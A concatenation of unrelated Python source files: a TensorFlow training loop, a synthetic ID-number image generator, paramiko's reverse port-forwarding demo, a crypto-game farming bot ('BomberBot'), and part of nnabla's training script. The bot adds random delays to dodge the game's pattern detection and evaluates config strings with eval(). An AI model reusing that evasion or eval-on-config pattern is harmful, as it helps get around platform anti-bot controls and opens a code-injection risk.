save_train_start(out.dir, data, on_step, evaluators, train_params, notes)
if train_params.eval_at_zero:
print("Running evaluation...")
start_eval = False
for name, data in eval_datasets.items():
n_samples = train_params.eval_samples.get(name)
evaluation = evaluator_runner.run_evaluators(sess, data, name, n_samples)
for s in evaluation.to_summaries(name + "-"):
summary_writer.add_summary(s, on_step)
batch_time = 0
for epoch in range(train_params.num_epochs):
for batch_ix, batch in enumerate(train.get_epoch()):
t0 = time.perf_counter()
on_step = sess.run(global_step) + 1 # +1 because all calculations are done after step
get_summary = on_step % train_params.log_period == 0
encoded = model.encode(batch, True)
if get_summary:
summary, _, batch_loss = sess.run([summary_tensor, train_opt, loss], feed_dict=encoded)
else:
summary = None
_, batch_loss = sess.run([train_opt, loss], feed_dict=encoded)
if np.isnan(batch_loss):
raise RuntimeError("NaN loss!")
batch_time += time.perf_counter() - t0
if get_summary:
print("on epoch=%d batch=%d step=%d time=%.3f" %
(epoch, batch_ix + 1, on_step, batch_time))
summary_writer.add_summary(tf.Summary(value=[tf.Summary.Value(tag="time", simple_value=batch_time)]),
on_step)
summary_writer.add_summary(summary, on_step)
batch_time = 0
# occasional saving
if on_step % train_params.save_period == 0:
print("Checkpointing")
saver.save(sess, join(out.save_dir, "checkpoint-" + str(on_step)), global_step=global_step)
# Occasional evaluation
if (on_step % train_params.eval_period == 0) or start_eval:
print("Running evaluation...")
start_eval = False
t0 = time.perf_counter()
for name, data in eval_datasets.items():
n_samples = train_params.eval_samples.get(name)
evaluation = evaluator_runner.run_evaluators(sess, data, name, n_samples)
for s in evaluation.to_summaries(name + "-"):
summary_writer.add_summary(s, on_step)
print("Evaluation took: %.3f seconds" % (time.perf_counter() - t0))
saver.save(sess, relpath(join(out.save_dir, "checkpoint-" + str(on_step))), global_step=global_step)
sess.close()
def _train_async(model: Model,
data: TrainingData,
checkpoint: Union[str, None],
parameter_checkpoint: Union[str, None],
save_start: bool,
train_params: TrainParams,
evaluators: List[Evaluator],
out: ModelDir,
notes=None,
dry_run=False,
start_eval=False,
save_graph=False):
""" Train while encoding batches on a seperate thread and storing them in a tensorflow Queue, can
be much faster then using the feed_dict approach """
print("Loading train data...")
train = data.get_train()
print("Loading dev data...")
eval_datasets = data.get_eval()
loader = data.get_resource_loader()
print("Training on %d batches" % len(train))
print("Evaluation datasets: " + " ".join("%s (%d)" % (name, len(data)) for name, data in eval_datasets.items()))
# spec the model for the given datasets
model.set_inputs([train] + list(eval_datasets.values()), loader)
placeholders = model.get_placeholders()
train_queue = tf.FIFOQueue(train_params.async_encoding, [x.dtype for x in placeholders], name="train_queue")
evaluator_runner = AysncEvaluatorRunner(evaluators, model, train_params.async_encoding)
train_enqeue = train_queue.enqueue(placeholders)
train_close = train_queue.close(True)
is_train = tf.placeholder(tf.bool, ())
input_tensors = tf.cond(is_train, lambda: train_queue.dequeue(),
lambda: evaluator_runner.eval_queue.dequeue())
# tensorfow can't infer the shape for an unsized queue, so set it manually
for input_tensor, pl in zip(input_tensors, placeholders):
input_tensor.set_shape(pl.shape)
print("Init model...")
sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))
with sess.as_default():
pred = model.get_predictions_for(dict(zip(placeholders, input_tensors)))
evaluator_runner.set_input(pred)
if parameter_checkpoint is not None:
print("Restoring parameters from %s" % parameter_checkpoint)
saver = tf.train.Saver()
saver.restore(sess, checkpoint)
saver = None
print("Setting up model prediction / tf...")
all_vars = tf.global_variables()
loss, summary_tensor, train_opt, global_step, weight_ema = _build_train_ops(train_params)
# Pre-compute tensors we need at evaluations time
eval_tensors = []
for ev in evaluators:
eval_tensors.append(ev.tensors_needed(pred))
if train_params.best_weights is not None:
lst = all_vars
if weight_ema is not None:
for x in lst:
v = weight_ema.average(x)
if v is not None:
lst.append(v)
best_weight_saver = tf.train.Saver(var_list=lst, max_to_keep=1)
cur_best = None
else:
best_weight_saver = None
cur_best = None
saver = tf.train.Saver(max_to_keep=train_params.max_checkpoints_to_keep)
summary_writer = tf.summary.FileWriter(out.log_dir)
# Load or initialize the model parameters
if checkpoint is not None:
print("Restoring from checkpoint...")
saver.restore(sess, checkpoint)
print("Loaded checkpoint: " + str(sess.run(global_step)))
else:
print("Initializing parameters...")
sess.run(tf.global_variables_initializer())
# # TODO : at this place initialize the elmo token embeddings
try:
if model.use_elmo and model.token_lookup:
elmo_token_embed_placeholder, elmo_token_embed_init = model.get_elmo_token_embed_ph_and_op()
print("Loading ELMo weights...")
elmo_token_embed_weights = load_elmo_pretrained_token_embeddings(model.lm_model.embed_weights_file)
sess.run(elmo_token_embed_init, feed_dict={elmo_token_embed_placeholder: elmo_token_embed_weights})
except (AttributeError, NotImplementedError) as e:
pass
# Make sure no bugs occur that add to the graph in the train loop, that can cause (eventuall) OOMs
tf.get_default_graph().finalize()
if save_graph:
summary_writer.add_graph(sess.graph)
if dry_run:
return
on_step = sess.run(global_step)
if save_start:
# summary_writer.add_graph(sess.graph, global_step=on_step)
save_train_start(out.dir, data, sess.run(global_step), evaluators, train_params, notes)
def enqueue_train():
try:
# feed data from the dataset iterator -> encoder -> queue
for epoch in range(train_params.num_epochs):
for batch in train.get_epoch():
feed_dict = model.encode(batch, True)
sess.run(train_enqeue, feed_dict)
except tf.errors.CancelledError:
# The queue_close operator has been called, exit gracefully
return
except Exception as e:
# Crashes the main thread with a queue exception
sess.run(train_close)
raise e
train_enqueue_thread = Thread(target=enqueue_train)
train_enqueue_thread.daemon = True # Ensure we exit the program on an excpetion
print("Start training!")
batch_time = 0
train_dict = {is_train: True}
eval_dict = {is_train: False}
terminate = False
try:
train_enqueue_thread.start()
for epoch in range(train_params.num_epochs):
if terminate:
print("Stopping because of learning rate termination")
break
for batch_ix in range(len(train)):
t0 = time.perf_counter()
on_step = sess.run(global_step) + 1
get_summary = on_step % train_params.log_period == 0
if get_summary:
summary, _, batch_loss = sess.run([summary_tensor, train_opt, loss], feed_dict=train_dict)
else:
summary = None
_, batch_loss = sess.run([train_opt, loss], feed_dict=train_dict)
if np.isnan(batch_loss):
raise RuntimeError("NaN loss!")
batch_time += time.perf_counter() - t0
if summary is not None:
print("on epoch=%d batch=%d step=%d, time=%.3f" %
(epoch, batch_ix + 1, on_step, batch_time))
summary_writer.add_summary(
tf.Summary(value=[tf.Summary.Value(tag="time", simple_value=batch_time)]), on_step)
summary_writer.add_summary(summary, on_step)
batch_time = 0
# occasional saving
if on_step % train_params.save_period == 0:
print("Checkpointing")
saver.save(sess, join(out.save_dir, "checkpoint-" + str(on_step)), global_step=global_step)
# Occasional evaluation
if (on_step % train_params.eval_period == 0) or start_eval:
print("Running evaluation...")
start_eval = False
t0 = time.perf_counter()
for name, data in eval_datasets.items():
n_samples = train_params.eval_samples.get(name)
evaluation = evaluator_runner.run_evaluators(sess, data, name, n_samples, eval_dict)
for s in evaluation.to_summaries(name + "-"):
summary_writer.add_summary(s, on_step)
# Maybe save as the best weights
if train_params.best_weights is not None and name == train_params.best_weights[0]:
val = evaluation.scalars[train_params.best_weights[1]]
if cur_best is None or val > cur_best:
print("Save weights with current best weights (%s vs %.5f)" % (
"None" if cur_best is None else ("%.5f" % cur_best), val))
best_weight_saver.save(sess, join(out.best_weight_dir, "best"), global_step=global_step)
cur_best = val
if train_params.reduce_lr_on_plateau is not None \
and name == train_params.reduce_lr_on_plateau.dev_name:
train_params.reduce_lr_on_plateau(
updated_scalar_value=evaluation.scalars[train_params.reduce_lr_on_plateau.scalar_name],
sess=sess)
print("Evaluation took: %.3f seconds" % (time.perf_counter() - t0))
if train_params.reduce_lr_on_plateau is not None:
if train_params.reduce_lr_on_plateau.terminate(sess):
terminate = True
break
finally:
sess.run(train_close) # terminates the enqueue thread with an exception
train_enqueue_thread.join()
saver.save(sess, relpath(join(out.save_dir, "checkpoint-" + str(on_step))), global_step=global_step)
sess.close()
def test(model: Model, evaluators, datasets: Dict[str, Dataset], loader, checkpoint,
ema=True, aysnc_encoding=None, sample=None) -> Dict[str, Evaluation]:
print("Setting up model")
model.set_inputs(list(datasets.values()), loader)
if aysnc_encoding:
evaluator_runner = AysncEvaluatorRunner(evaluators, model, aysnc_encoding)
inputs = evaluator_runner.dequeue_op
else:
evaluator_runner = EvaluatorRunner(evaluators, model)
inputs = model.get_placeholders()
input_dict = {p: x for p, x in zip(model.get_placeholders(), inputs)}
sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))
with sess.as_default():
pred = model.get_predictions_for(input_dict)
evaluator_runner.set_input(pred)
print("Restoring variables")
saver = tf.train.Saver()
saver.restore(sess, checkpoint)
if ema:
# FIXME This is a bit stupid, since we are loading variables twice, but I found it
# a bit fiddly to load the variables directly....
ema = tf.train.ExponentialMovingAverage(0)
reader = tf.train.NewCheckpointReader(checkpoint)
expected_ema_names = {ema.average_name(x): x for x in tf.trainable_variables()
if reader.has_tensor(ema.average_name(x))}
if len(expected_ema_names) > 0:
print("Restoring EMA variables")
saver = tf.train.Saver(expected_ema_names)
saver.restore(sess, checkpoint)
try:
if model.use_elmo and model.token_lookup:
elmo_token_embed_placeholder, elmo_token_embed_init = model.get_elmo_token_embed_ph_and_op()
print("Loading ELMo weights...")
elmo_token_embed_weights = load_elmo_pretrained_token_embeddings(model.lm_model.embed_weights_file)
sess.run(elmo_token_embed_init, feed_dict={elmo_token_embed_placeholder: elmo_token_embed_weights})
except (AttributeError, NotImplementedError) as e:
pass
tf.get_default_graph().finalize()
print("Begin evaluation")
dataset_outputs = {}
for name, dataset in datasets.items():
dataset_outputs[name] = evaluator_runner.run_evaluators(sess, dataset, name, sample, {})
return dataset_outputs
|
chinese_idcard_number_area_generator.py | # -*- coding: utf-8 -*-
'''
模拟生成一组身份证号码区域图片,用来训练神经网络。
'''
import threading
import os
import shutil
import random
from PIL import Image, ImageDraw, ImageFont, ImageEnhance
COUNT = range(0, 500)
OUT_PATH = './generatedNumberAreaImages'
LABELS = '0123456789X'
def start():
'''
开始生成图片
1. 清空输出目录
2. 为了效率, 多线程加速生成
'''
if os.path.exists(OUT_PATH):
shutil.rmtree(OUT_PATH)
os.mkdir(OUT_PATH)
for idx in COUNT:
new_thread = threading.Thread(target=create_image, args=([idx]))
new_thread.start()
def create_image(idx):
'''
1. 读取 `resources` 目录下的背景图片和文字
2. 把当前 `label` 画到背景上,并且做一些随机变化
'''
o_image = Image.open('./resources/background.png')
draw_brush = ImageDraw.Draw(o_image)
font_size = random.randint(-5, 5) + 35
draw_brush.text((10 + random.randint(-10, 10), 15 + random.randint(-2, 2)), LABELS,
fill='black',
font=ImageFont.truetype('./resources/OCR-B 10 BT.ttf', font_size))
o_image = ImageEnhance.Color(o_image).enhance(
random.uniform(0.5, 1.5)) # 着色
o_image = ImageEnhance.Brightness(o_image).enhance(
random.uniform(0.5, 1.5)) # 亮度
o_image = ImageEnhance.Contrast(o_image).enhance(
random.uniform(0.5, 1.5)) # 对比度
o_image = ImageEnhance.Sharpness(o_image).enhance(
random.uniform(0.5, 1.5)) # 对比度
o_image = o_image.rotate(random.randint(-2, 2))
o_image.save(OUT_PATH + '/%d.png' % idx)
if __name__ == '__main__':
start()
|
rforward.py | #!/usr/bin/env python
# Copyright (C) 2008 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
Sample script showing how to do remote port forwarding over paramiko.
This script connects to the requested SSH server and sets up remote port
forwarding (the openssh -R option) from a remote port through a tunneled
connection to a destination reachable from the local machine.
"""
import getpass
import os
import socket
import select
import sys
import threading
from optparse import OptionParser
import paramiko
SSH_PORT = 22
DEFAULT_PORT = 4000
g_verbose = True
def handler(chan, host, port):
sock = socket.socket()
try:
sock.connect((host, port))
except Exception as e:
verbose('Forwarding request to %s:%d failed: %r' % (host, port, e))
return
verbose('Connected! Tunnel open %r -> %r -> %r' % (chan.origin_addr,
chan.getpeername(), (host, port)))
while True:
r, w, x = select.select([sock, chan], [], [])
if sock in r:
data = sock.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
sock.send(data)
chan.close()
sock.close()
verbose('Tunnel closed from %r' % (chan.origin_addr,))
def reverse_forward_tunnel(server_port, remote_host, remote_port, transport):
transport.request_port_forward('', server_port)
while True:
chan = transport.accept(1000)
if chan is None:
continue
thr = threading.Thread(target=handler, args=(chan, remote_host, remote_port))
thr.setDaemon(True)
thr.start()
def verbose(s):
if g_verbose:
print(s)
HELP = """\
Set up a reverse forwarding tunnel across an SSH server, using paramiko. A
port on the SSH server (given with -p) is forwarded across an SSH session
back to the local machine, and out to a remote site reachable from this
network. This is similar to the openssh -R option.
"""
def get_host_port(spec, default_port):
"parse 'hostname:22' into a host and port, with the port optional"
args = (spec.split(':', 1) + [default_port])[:2]
args[1] = int(args[1])
return args[0], args[1]
def parse_options():
global g_verbose
parser = OptionParser(usage='usage: %prog [options] <ssh-server>[:<server-port>]',
version='%prog 1.0', description=HELP)
parser.add_option('-q', '--quiet', action='store_false', dest='verbose', default=True,
help='squelch all informational output')
parser.add_option('-p', '--remote-port', action='store', type='int', dest='port',
default=DEFAULT_PORT,
help='port on server to forward (default: %d)' % DEFAULT_PORT)
parser.add_option('-u', '--user', action='store', type='string', dest='user',
default=getpass.getuser(),
help='username for SSH authentication (default: %s)' % getpass.getuser())
parser.add_option('-K', '--key', action='store', type='string', dest='keyfile',
default=None,
help='private key file to use for SSH authentication')
parser.add_option('', '--no-key', action='store_false', dest='look_for_keys', default=True,
help='don\'t look for or use a private key file')
parser.add_option('-P', '--password', action='store_true', dest='readpass', default=False,
help='read password (for key or password auth) from stdin')
parser.add_option('-r', '--remote', action='store', type='string', dest='remote', default=None, metavar='host:port',
help='remote host and port to forward to')
options, args = parser.parse_args()
if len(args) != 1:
parser.error('Incorrect number of arguments.')
if options.remote is None:
parser.error('Remote address required (-r).')
g_verbose = options.verbose
server_host, server_port = get_host_port(args[0], SSH_PORT)
remote_host, remote_port = get_host_port(options.remote, SSH_PORT)
return options, (server_host, server_port), (remote_host, remote_port)
def main():
options, server, remote = parse_options()
password = None
if options.readpass:
password = getpass.getpass('Enter SSH password: ')
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
verbose('Connecting to ssh host %s:%d ...' % (server[0], server[1]))
try:
client.connect(server[0], server[1], username=options.user, key_filename=options.keyfile,
look_for_keys=options.look_for_keys, password=password)
except Exception as e:
print('*** Failed to connect to %s:%d: %r' % (server[0], server[1], e))
sys.exit(1)
verbose('Now forwarding remote port %d to %s:%d ...' % (options.port, remote[0], remote[1]))
try:
reverse_forward_tunnel(options.port, remote[0], remote[1], client.get_transport())
except KeyboardInterrupt:
print('C-c: Port forwarding stopped.')
sys.exit(0)
if __name__ == '__main__':
main()
|
bombV1.04.py | # MIT License
#
# Copyright (c) 2021 Pablo Henrique
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import colorama
import pyautogui
import time
import threading
import configparser
import random
from colorama import Fore
from datetime import datetime
import glob
import cv2
pyautogui.FAILSAFE = False
now = datetime.now()
current_time = now.strftime("[%H:%M:%S]")
colorama.init()
config = configparser.ConfigParser()
config.read('settings.ini')
MapsCleared = 0
CiclesDone = 0
ErrorsFound = 0
UseMouse = True
BotaoWork = eval(config.get('settings', 'BotaoWork'), {}, {})
BotaoClose = eval(config.get('settings', 'BotaoClose'), {}, {})
BotaoMapa = eval(config.get('settings', 'BotaoMapa'), {}, {})
BotaoVoltar = eval(config.get('settings', 'BotaoVoltar'), {}, {})
BotaoHeroes = eval(config.get('settings', 'BotaoHeroes'), {}, {})
BotaoConnect = eval(config.get('settings', 'BotaoConnect'), {}, {})
BotaoMeta = eval(config.get('settings', 'BotaoMeta'), {}, {})
BotaoNewMap = eval(config.get('settings', 'BotaoNewMap'), {}, {})
TabsMeta = int(config['settings']['TabsMeta'])
PosicaoScroll = eval(config.get('settings', 'PosicaoScroll'), {}, {})
NumScroll = int(config['settings']['NumScroll'])
VelScroll = int(config['settings']['VelScroll'])
DelayFarm = int(config['settings']['DelayFarm'])
DelayStats = int(config['settings']['DelayStats'])
Heroes = int(config['settings']['Heroes'])
DelayToStart = int(config['settings']['DelayToStart'])
AntiDetection = bool(config.getboolean('settings', 'AntiDetection'))
AntiBot = int
MultiAccount = bool(config.getboolean('settings', 'MultiAccount'))
Accounts = int(config['settings']['Accounts'])
def pprint(text):
print(datetime.now().strftime("[%H:%M:%S]") + str(text))
# Put the heroes to work function
def work():
global CiclesDone
print(datetime.now().strftime("[%H:%M:%S]") + 'Putting heroes to work...')
time.sleep(3)
pyautogui.moveTo(BotaoVoltar)
pyautogui.click()
time.sleep(3)
pyautogui.moveTo(BotaoHeroes)
pyautogui.click()
time.sleep(3)
pyautogui.moveTo(PosicaoScroll)
time.sleep(0.5)
pyautogui.click()
for s in range(NumScroll):
pyautogui.scroll(VelScroll)
time.sleep(0.5)
time.sleep(2)
for _ in range(Heroes):
pyautogui.moveTo(BotaoWork)
pyautogui.click()
time.sleep(2)
time.sleep(1)
pyautogui.moveTo(BotaoClose)
pyautogui.click()
CiclesDone = CiclesDone + 1
# Open map from initial page
def abrir_mapa():
print(datetime.now().strftime("[%H:%M:%S]") + "Opening map...")
time.sleep(3)
pyautogui.moveTo(BotaoMapa)
pyautogui.click()
# Open map multi acc
def abrir_mapa2():
print(datetime.now().strftime("[%H:%M:%S]") + "Opening map...")
time.sleep(3)
for i in range(1, Accounts + 1):
config = configparser.ConfigParser()
aux = (f'multi{str(i)}.ini')
config.read(aux)
global BotaoMapa
BotaoMapa = eval(config.get('settings', 'BotaoMapa'), {}, {})
pyautogui.moveTo(BotaoMapa)
pyautogui.click()
#Single Account farm
def bot():
while True:
abrir_mapa()
work()
abrir_mapa()
tempo_farm()
# Multiacc loop farm
def multiacc():
global Accounts
global CurrentConfig
while True:
for i in range(1, Accounts + 1):
config = configparser.ConfigParser()
aux = (f'multi{str(i)}.ini')
config.read(aux)
global BotaoWork
global BotaoClose
global BotaoMapa
global BotaoVoltar
global BotaoHeroes
global BotaoNewMap
global PosicaoScroll
global VelScroll
global Heroes
global NumScroll
BotaoWork = eval(config.get('settings', 'BotaoWork'), {}, {})
BotaoClose = eval(config.get('settings', 'BotaoClose'), {}, {})
BotaoMapa = eval(config.get('settings', 'BotaoMapa'), {}, {})
BotaoVoltar = eval(config.get('settings', 'BotaoVoltar'), {}, {})
BotaoHeroes = eval(config.get('settings', 'BotaoHeroes'), {}, {})
BotaoNewMap = eval(config.get('settings', 'BotaoNewMap'), {}, {})
PosicaoScroll = eval(config.get('settings', 'PosicaoScroll'), {}, {})
NumScroll = int(config['settings']['NumScroll'])
VelScroll = int(config['settings']['VelScroll'])
Heroes = int(config['settings']['Heroes'])
abrir_mapa()
work()
abrir_mapa()
tempo_farm()
# Time to delay the work function
def tempo_farm():
global DelayFarm
global AntiBot
global AntiDetection
if AntiDetection:
AntiBot = random.randint(300, 1200)
else:
AntiBot = 0
anti_bot = int(AntiBot)
mins, secs = divmod(anti_bot, 60)
formatTime = (f'{mins:02d}:{secs:02d}')
print(datetime.now().strftime("[%H:%M:%S]") + f"Added: [{formatTime}] minutes for avoid pattern detection")
countdown = DelayFarm + anti_bot
while countdown:
mins, secs = divmod(countdown, 60)
hours, mins = divmod(mins, 60)
timeformat = (f'{hours:d}:{mins:02d}:{secs:02d}')
print(datetime.now().strftime("[%H:%M:%S]") + f"Heroes farming/resting. Waiting timer:\t[{timeformat}]\r",
end="")
time.sleep(1)
countdown -= 1
# Check for errors
def check_errors():
global ErrorsFound
while True:
errors = glob.glob("Errors/*.png")
for erro in errors:
erro = pyautogui.locateCenterOnScreen(erro, confidence=0.8)
if erro:
print("Error found")
pyautogui.moveTo(erro)
time.sleep(0.7)
pyautogui.click(erro)
pyautogui.hotkey('ctrl', 'f5')
ErrorsFound = ErrorsFound + 1
#connect()
#time.sleep(60)
#Click next map
def check_map():
global MapsCleared
maps = glob.glob("NewMap/*.png")
while True:
for map in maps:
map = pyautogui.locateCenterOnScreen(map, confidence=0.9)
if map:
pyautogui.moveTo(map)
time.sleep(0.8)
pyautogui.click()
time.sleep(1)
pyautogui.click()
MapsCleared = MapsCleared + 1
# Use Mouse to login
def mouse_login():
print("Using mouse to login")
aux = None
if MultiAccount:
for i in range(1, Accounts):
sign = pyautogui.locateCenterOnScreen(f"Imgs\\SIGN{i}.png", confidence=0.9)
if sign:
print("Sign found")
aux = sign
else:
sign = pyautogui.locateCenterOnScreen(f"Imgs\\SIGN.png", confidence=0.9)
if sign:
print("Sign found")
aux = sign
if aux:
pyautogui.moveTo(aux)
time.sleep(3)
pyautogui.click()
print("Sign Clicked")
time.sleep(15)
else:
print("Sign not Clicked")
# Connect from mainpage
def connect():
global UseMouse
retries = 0
main = glob.glob(f"Imgs/MAIN*.png")
time.sleep(5)
while True:
aux = None
auxAba = None
for img in main:
img = pyautogui.locateCenterOnScreen(img, confidence=0.5)
aux = img
if aux:
print("\n")
pprint(Fore.RED + "Reconnecting.")
print(Fore.MAGENTA)
print("\n")
aux2 = aux
pyautogui.moveTo(aux2)
pyautogui.click()
time.sleep(3)
retries = retries + 1
print(f"\nretries:{retries}\n")
if retries >= 3:
pyautogui.press('f5')
retries = 0
else:
pass
if UseMouse:
mouse_login()
else:
pass
for _ in range(15):
Aba = pyautogui.locateCenterOnScreen("Imgs\\ABAMETA.png", confidence=0.9)
if Aba:
auxAba = Aba
else:
pass
if auxAba:
pyautogui.moveTo(auxAba)
time.sleep(0.3)
pyautogui.click()
mouse_login()
else:
pass
time.sleep(20)
if MultiAccount:
abrir_mapa2()
else:
abrir_mapa2()
# Show farm stats
def show_stats():
while True:
time.sleep(600)
print("\n")
print(Fore.BLUE + "-" * 80)
print(Fore.BLUE + datetime.now().strftime("[%H:%M:%S]") + "Cicles of farming done: " + str(CiclesDone))
print(Fore.BLUE + datetime.now().strftime("[%H:%M:%S]") + "Maps Cleared: " + str(MapsCleared))
print(Fore.BLUE + datetime.now().strftime("[%H:%M:%S]") + "Errors found: " + str(ErrorsFound))
print(Fore.BLUE + "-" * 80)
print("\n")
print(Fore.MAGENTA)
time.sleep(DelayStats)
# Start threading
def threads():
threadss = []
t1 = threading.Thread(target=check_errors)
t2 = threading.Thread(target=check_map)
if MultiAccount:
t3 = threading.Thread(target=multiacc)
else:
t3 = threading.Thread(target=bot)
t4 = threading.Thread(target=show_stats)
t5 = threading.Thread(target=connect)
t1.start()
t2.start()
t3.start()
t4.start()
t5.start()
threadss.append(t1)
threadss.append(t2)
threadss.append(t3)
threadss.append(t4)
threadss.append(t5)
for thread in threadss:
thread.join()
string1 = "BomberBot V1.04"
string2 = "Telegram:t.me/BomberBotBB"
string3 = "Github:github.com/henr1q/BomberBot"
string4 = f"Metamask:{Fore.CYAN}0x94843B902427006bedaC7fb24039500411D599Ac"
string5 = "This bot is FREE."
print(Fore.GREEN + "=" * 40)
print(Fore.BLUE + string1.center(40, " "))
print(Fore.BLUE + string2.center(40, " "))
print(Fore.BLUE + string3.center(40, " "))
print(Fore.BLUE + string4.center(40, " "))
print(Fore.BLUE + Fore.RED + string5.center(40, " "))
print(Fore.GREEN + "=" * 40)
print(Fore.GREEN)
def botmenu():
menu = int(input(
"Choose a option:\n1)Run the bot\n2)Test/Debug a single function(Use this if you having problems with mapping)\n3)Exit\n\n"))
print(Fore.MAGENTA)
if menu == 1:
defaultdelay = 10
print(datetime.now().strftime(
"[%H:%M:%S]") + f"Bot will start in {defaultdelay + DelayToStart} seconds. Make sure to go to the main page.")
time.sleep(10 + DelayToStart)
threads()
elif menu == 2:
menu2 = int(input(datetime.now().strftime(
"\n[%H:%M:%S]") + "Choose a function to test it:\n1)Open Map\n2)Put heroes to work\n3)Connect from login page\n4)Find and click next map\n5)Check for error and try reconnect\n6)Relog from main page stuck\n7)Exit\n\n"))
if menu2 == 1:
print(Fore.CYAN + datetime.now().strftime(
"[%H:%M:%S]") + "Delaying 5 seconds and starting the function. Make sure to go to the page where function should work.")
time.sleep(5)
abrir_mapa()
botmenu()
if menu2 == 2:
print(Fore.CYAN + datetime.now().strftime(
"[%H:%M:%S]") + "Delaying 5 seconds and starting the function. Make sure to go to the page where function should work.")
time.sleep(5)
work()
botmenu()
if menu2 == 3:
print(Fore.CYAN + datetime.now().strftime(
"[%H:%M:%S]") + "Delaying 5 seconds and starting the function. Make sure to go to the page where function should worke.")
time.sleep(5)
connect()
botmenu()
if menu2 == 4:
print(Fore.CYAN + datetime.now().strftime(
"[%H:%M:%S]") + "Delaying 5 seconds and starting the function. Make sure to go to the page where function should work.")
time.sleep(5)
check_map()
botmenu()
if menu2 == 5:
print(Fore.CYAN + datetime.now().strftime(
"[%H:%M:%S]") + "Delaying 5 seconds and starting the function. Make sure to go to the page where function should work.")
time.sleep(5)
check_errors()
botmenu()
if menu2 == 6:
print(Fore.CYAN + datetime.now().strftime(
"[%H:%M:%S]") + "Delaying 5 seconds and starting the function. Make sure to go to the page where function should work.")
print("This function takes 3 minutes on main page")
time.sleep(5)
botmenu()
if menu2 == 7:
print(Fore.GREEN)
botmenu()
else:
print(Fore.RED + datetime.now().strftime("[%H:%M:%S]") + "Choose a valid option")
elif menu == 3:
print("Error")
#sys.exit()
else:
print(Fore.RED + datetime.now().strftime("[%H:%M:%S]") + "Choose a valid option")
botmenu()
|
train.py | # Copyright (c) 2017 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from six.moves import range
from collections import OrderedDict
from contextlib2 import ExitStack # Backport from python3
import numpy as np
import glob
import os
import time
import zipfile
import nnabla as nn
from nnabla.logger import logger
from nnabla import available_contexts
from nnabla.parameter import save_parameters
from nnabla.utils.progress import configure_progress, progress
from nnabla.utils.cli.utility import let_data_to_variable
from nnabla.utils.nnp_format import nnp_version
from nnabla.utils.communicator_util import current_communicator, single_or_rankzero
import nnabla.utils.load as load
_save_parameter_info = {}
def _all_reduce(comm, var, division, inplace):
import threading
_finish = False
def _wait():
import time
import sys
count = 0
while not _finish:
if count > 10000:
logger.log(99, "STALLED MPI RANK {}".format(comm.rank))
sys.exit(-1)
time.sleep(0.01)
count += 1
th = threading.Thread(target=_wait)
th.start()
comm.all_reduce(var, division=division, inplace=inplace)
_finish = True
th.join()
def _save_parameters(args, suffix, epoch, force=False):
global _save_parameter_info
if suffix not in _save_parameter_info:
_save_parameter_info[suffix] = {}
_save_parameter_info[suffix]['epoch'] = 0
_save_parameter_info[suffix]['time'] = 0
current_time = time.time()
timediff = current_time - _save_parameter_info[suffix]['time']
epochdiff = epoch - _save_parameter_info[suffix]['epoch']
globname = os.path.join(args.outdir, 'results_{}_*.nnp'.format(suffix))
exists = glob.glob(globname)
base = os.path.join(args.outdir, 'results_{}_{}'.format(suffix, epoch))
if suffix == 'best':
base = os.path.join(args.outdir, 'results')
filename = base + '.nnp'
if force or timediff > 180.0 or epochdiff > 10:
version_filename = base + '_version.txt'
with open(version_filename, 'w') as file:
file.write('{}\n'.format(nnp_version()))
param_filename = base + '_param.protobuf'
save_parameters(param_filename)
with zipfile.ZipFile(filename, 'w') as nnp:
nnp.write(version_filename, 'nnp_version.txt')
nnp.write(_save_parameter_info['config'], os.path.basename(
_save_parameter_info['config']))
nnp.write(param_filename, 'parameter.protobuf')
os.unlink(version_filename)
os.unlink(param_filename)
for exist in exists:
os.unlink(exist)
_save_parameter_info[suffix]['epoch'] = epoch
_save_parameter_info[suffix]['time'] = current_time
def _update(iter, config, cost):
comm = current_communicator()
loaded_data = {}
is_first_optimizer = True
def _sum_cost():
if comm:
# logger.log(99, "Calc cost with communicator")
var = [nn.NdArray()]
var[0].data = cost.sum_iteration
_all_reduce(comm, var, division=False, inplace=True)
cost.sum_epoch += var[0].data
cost.num_iteration += comm.size
else:
cost.sum_epoch += cost.sum_iteration
cost.num_iteration += 1
for opt in config.optimizers.values():
o = opt.optimizer
# Load dataset
di = opt.data_iterator
if o.data_iterator not in loaded_data:
